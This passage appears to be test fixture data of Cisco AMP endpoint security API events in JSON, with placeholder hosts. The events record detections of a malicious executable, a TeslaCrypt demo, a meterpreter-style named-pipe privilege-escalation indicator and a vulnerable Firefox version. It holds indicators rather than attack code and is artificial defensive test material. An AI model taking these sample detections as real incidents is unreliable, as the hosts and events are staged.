Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"67.43.156.12","remote_port":443,"local_ip":"10.10.0.0","local_port":55810,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":978000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"67.43.156.12","remote_port":443,"local_ip":"10.10.0.0","local_port":55805,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"67.43.156.12","remote_port":443,"local_ip":"10.10.0.0","local_port":55809,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":931000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"67.43.156.12","remote_port":443,"local_ip":"10.10.0.0","local_port":55808,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":900000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"67.43.156.12","remote_port":443,"local_ip":"10.10.0.0","local_port":55807,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":869000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"67.43.156.12","remote_port":443,"local_ip":"10.10.0.0","local_port":55806,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1476910664322001000,"timestamp":1610706778,"timestamp_nanoseconds":322000000,"date":"2021-01-15T10:32:58+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706778,"start_date":"2021-01-15T10:32:58+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Meterpreter","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"27:85:29:21:67:49"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\System.","short_description":"W32.PossibleNamedPipeImpersonation.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/WINDOWS/system32/cmd.exe","identity":{"sha256":"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2"},"parent":{"disposition":"Clean","identity":{"sha256":"69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671385032557000,"timestamp":1610706459,"timestamp_nanoseconds":25000000,"date":"2021-01-15T10:27:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671385032556606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900329000200,"timestamp":1610706298,"timestamp_nanoseconds":329000000,"date":"2021-01-15T10:24:58+00:00","event_type":"Multiple Infected 
Files","event_type_id":1107296258,"detection":"W32.3372C1EDAB-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706298,"start_date":"2021-01-15T10:24:58+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":926000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":533000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":15212386047828,"timestamp":1610706149,"timestamp_nanoseconds":0,"date":"2021-01-15T10:22:29+00:00","event_type":"Executed 
malware","event_type_id":1107296272,"detection":"W32.B1380FD95B-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706149,"start_date":"2021-01-15T10:22:29+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"file:///C%3A/ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967"},"parent":{"disposition":"Clean","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669929038643000,"timestamp":1610706120,"timestamp_nanoseconds":973000000,"date":"2021-01-15T10:22:00+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669929038643250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669929038643000,"timestamp":1610706120,"timestamp_nanoseconds":951000000,"date":"2021-01-15T10:22:00+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669929038643249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669929038643000,"timestamp":1610706120,"timestamp_nanoseconds":576000000,"date":"2021-01-15T10:22:00+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669929038643248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669671340605000,"timestamp":1610706060,"timestamp_nanoseconds":333000000,"date":"2021-01-15T10:21:00+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669671340605487","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669671340605000,"timestamp":1610706060,"timestamp_nanoseconds":195000000,"date":"2021-01-15T10:21:00+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669671340605486","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669671340605000,"timestamp":1610706060,"timestamp_nanoseconds":170000000,"date":"2021-01-15T10:21:00+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669671340605485","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669667045638000,"timestamp":1610706059,"timestamp_nanoseconds":779000000,"date":"2021-01-15T10:20:59+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669667045638188","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":15210587194928,"timestamp":1610706000,"timestamp_nanoseconds":0,"date":"2021-01-15T10:20:00+00:00","event_type":"Vulnerable Application 
Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610706000,"start_date":"2021-01-15T10:20:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"firefox.exe","identity":{"sha256":"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}},"vulnerabilities":[{"name":"Mozilla Firefox","version":"41.0","cve":"CVE-2015-7204","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669409347600000,"timestamp":1610705999,"timestamp_nanoseconds":257000000,"date":"2021-01-15T10:19:59+00:00","event_type":"Threat 
